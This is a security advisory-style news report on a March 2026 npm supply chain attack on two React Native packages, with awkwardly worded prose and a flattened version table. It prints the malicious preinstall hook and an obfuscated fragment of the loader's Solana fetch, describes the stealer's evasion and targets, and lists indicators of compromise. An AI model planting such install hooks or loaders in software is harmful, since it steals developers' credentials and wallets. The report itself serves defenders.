Researchers found a coordinated supply chain attack on two popular React Native npm packages on March 16, 2026. The infected releases add an install-time loader that quietly downloads and runs a multi-stage Windows credential and cryptocurrency thief. All it takes for developers to get infected is to run a normal npm installation.
The Attack on the Supply Chain The threat actor hacked packages that AstrOOnauta had published and released bad versions of them within minutes of each other. The attack replaced clean updates with infected ones that have the same malicious payload. Name of the Package Version without any dirt Bad Version Monthly Downloads of react-native-international-phone-number 0.11.7 0.11.8 ~92,000 react-native-country-select 0.3.9 0.3.91 about 42,000 Aikido says that the bad code depends on a new preinstall script that was added to the package's configuration file.
This script runs on its own before the main installation is done. The two bad releases both add the same package lifecycle hook: "scripts": { "preinstall": "node install.js" } The heavily obfuscated code first connects to a Solana remote procedure call endpoint to get a transaction memo. This memo has a hidden web link for the second stage.
The original installer that was sent shows the Solana RPC fetch right away: Let y = await fetch(S, { 'method': e(0x45b, 'nSeb', 0x48f, 0x42b), 'headers': M, 'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({ 'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425), 'id': 0x1, 'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3), 'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t] }); After downloading, the second stage gives you the decryption keys you need to open the last Windows-focused stealer.
In this last step, the attacker changes scheduled tasks and registry keys on the victim's machine to make sure they stay there. The malware uses a Google Calendar URL as an extra layer of indirection to get its last instructions so it can hide its tracks. Tactics for Impact and Evasion The malware checks the victim's system environment, such as language settings and time zones, to make sure the victim is not in Russia.
The malware will quietly leave if it finds signals like "ru_RU" or a Russian time zone. This kind of geographic filtering is a common way for Russian-speaking criminals to get around. If the system passes the location check, the payload looks through the victim's application data for profiles for the Chromium and Firefox browsers.
It is very clear that it is aimed at extensions for MetaMask, Phantom, Trust Wallet, and a few other cryptocurrency wallets. It also runs system commands to steal GitHub credentials and authenticated npm registry tokens. Information about the type of indicator Malicious Hash (SHA-256) 59221aa9623d86c930357dba7e3f54138c7ccbd0daa9c483d766cd8ce1b6ad26 Malicious IPs 45.32.150.251 and 217.69.3.152 Associated Domains socket.network, n.xyz, and p.link Anyone who uses these packages should check their environments right away.
The best way to fix this is to pin dependencies to the last clean versions you know of and change any credentials that are open.
